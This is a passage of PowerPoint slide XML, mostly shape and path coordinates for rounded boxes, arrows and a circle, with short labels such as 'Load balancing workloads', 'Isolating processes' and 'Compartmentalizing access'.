                  <a:moveTo>
                    <a:pt x="756969" y="368486"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="735643" y="368486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822638" y="432748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822384" y="432494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842519" y="432494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830385" y="422588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756969" y="368486"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="668367" y="308542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="645346" y="308542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735897" y="368740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735643" y="368486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756969" y="368486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743009" y="358199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668367" y="308542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="481890" y="201608"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454719" y="201608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552001" y="253043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645600" y="308796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645346" y="308542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668367" y="308542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652331" y="297874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558097" y="241994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481890" y="201608"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="551747" y="252916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="551960" y="253043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551747" y="252916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="384892" y="154999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="354643" y="154999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455100" y="201862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454719" y="201608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481890" y="201608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460561" y="190305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384892" y="154999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="183550" y="75878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="145220" y="75878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251773" y="113089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354897" y="155126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354643" y="154999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384892" y="154999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359850" y="143315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256091" y="101151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183550" y="75878"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="251392" y="112962"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="251704" y="113089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251392" y="112962"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="75015" y="42167"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74481" y="48573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71473" y="54260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145474" y="76005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145220" y="75878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183550" y="75878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149284" y="63940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75015" y="42167"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="33512" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19617" y="4409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8389" y="13723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329" y="27110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4409" y="56114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13723" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27110" y="74354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42191" y="75684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56130" y="71274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67401" y="61960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71473" y="54260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36127" y="43874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39683" y="31809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75199" y="31809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71290" y="19569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61962" y="8336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48573" y="1329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33512" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="39683" y="31809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36127" y="43874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71473" y="54260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74481" y="48573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75015" y="42167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39683" y="31809"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="75199" y="31809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39683" y="31809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75015" y="42167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75737" y="33494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75199" y="31809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422135" y="7362444"/>
              <a:ext cx="981710" cy="637540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981709" h="637540">
                  <a:moveTo>
                    <a:pt x="875157" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106298" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="8338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="31083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="64829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="530859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="572186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="605934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="628688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106298" y="637031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="637031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="628688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="605934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="572186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="530859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="106171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="64829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="31083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="8338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="0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422135" y="7362444"/>
              <a:ext cx="981710" cy="637540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981709" h="637540">
                  <a:moveTo>
                    <a:pt x="0" y="106171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8358" y="64829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="31083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="8338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106298" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="8338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="31083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="64829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="106171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="530859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="572186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="605934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="628688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="637031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106298" y="637031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="628688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="605934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="572186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="530859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10617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6813550" y="7450073"/>
            <a:ext cx="2000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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>3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125969" y="5736082"/>
            <a:ext cx="994410" cy="651510"/>
            <a:chOff x="7125969" y="5736082"/>
            <a:chExt cx="994410" cy="651510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7132319" y="5742432"/>
              <a:ext cx="981710" cy="638810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981709" h="638810">
                  <a:moveTo>
                    <a:pt x="875156" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106299" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="532129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106299" y="638555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875156" y="638555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981455" y="532129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981455" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875156" y="0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132319" y="5742432"/>
              <a:ext cx="981710" cy="638810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981709" h="638810">
                  <a:moveTo>
                    <a:pt x="0" y="106425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8358" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106299" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875156" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981455" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981455" y="532129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875156" y="638555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106299" y="638555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="532129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10642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7523480" y="5830570"/>
            <a:ext cx="2000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0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298438" y="4049014"/>
            <a:ext cx="994410" cy="651510"/>
            <a:chOff x="6298438" y="4049014"/>
            <a:chExt cx="994410" cy="651510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6304788" y="4055364"/>
              <a:ext cx="981710" cy="638810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981709" h="638810">
                  <a:moveTo>
                    <a:pt x="875157" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106299" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="532130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106299" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="532130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="0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304788" y="4055364"/>
              <a:ext cx="981710" cy="638810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981709" h="638810">
                  <a:moveTo>
                    <a:pt x="0" y="106425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8358" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106299" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981456" y="532130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973097" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950309" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916519" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875157" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106299" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64936" y="630195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31146" y="607393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8358" y="573565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="532130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10642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6695693" y="4143247"/>
            <a:ext cx="2000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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>1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32903" y="4188967"/>
            <a:ext cx="341122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Lo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balanci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7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worklo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ds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334882" y="5873241"/>
            <a:ext cx="325564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Isolating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pr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oc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7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32903" y="7616443"/>
            <a:ext cx="425132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Compartmentalizing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access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732276" y="4727447"/>
            <a:ext cx="2740660" cy="2740660"/>
            <a:chOff x="3732276" y="4727447"/>
            <a:chExt cx="2740660" cy="2740660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3732276" y="4727447"/>
              <a:ext cx="2740660" cy="2740660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740660" h="2740659">
                  <a:moveTo>
                    <a:pt x="1370076" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1321977" y="828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1274294" y="3296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227055" y="7375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180287" y="13039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134016" y="20260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088271" y="29012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043077" y="39266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="998463" y="50997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954455" y="64176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911081" y="78777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868368" y="94772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826342" y="112135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785032" y="130838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744464" y="150853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704666" y="172155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665664" y="194715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627486" y="218506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590160" y="243501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553711" y="269674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518168" y="296996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483557" y="325441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449906" y="354982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417241" y="385591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385591" y="417241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354982" y="449906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325441" y="483557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296996" y="518168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269674" y="553711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243501" y="590160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218506" y="627486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194715" y="665664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172155" y="704666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150853" y="744464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130838" y="785032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112135" y="826342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94772" y="868368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78777" y="911081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64176" y="954455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50997" y="998463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39266" y="1043077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29012" y="1088271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20260" y="1134016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13039" y="1180287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7375" y="1227055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3296" y="1274294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="1321977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1370076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="1418174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3296" y="1465857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7375" y="1513096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13039" y="1559864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20260" y="1606135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29012" y="1651880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39266" y="1697074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50997" y="1741688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64176" y="1785696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78777" y="1829070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94772" y="1871783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112135" y="1913809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130838" y="1955119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150853" y="1995687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172155" y="2035485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194715" y="2074487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218506" y="2112665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243501" y="2149991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269674" y="2186440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296996" y="2221983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325441" y="2256594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354982" y="2290245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385591" y="2322910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417241" y="2354560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449906" y="2385169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483557" y="2414710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518168" y="2443155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553711" y="2470477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590160" y="2496650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627486" y="2521645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665664" y="2545436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704666" y="2567996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744464" y="2589298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785032" y="2609313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826342" y="2628016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868368" y="2645379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911081" y="2661374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954455" y="2675975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="998463" y="2689154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043077" y="2700885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088271" y="2711139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134016" y="2719891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180287" y="2727112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227055" y="2732776"/>
                  </a:lnTo>
                  <a:lnTo>
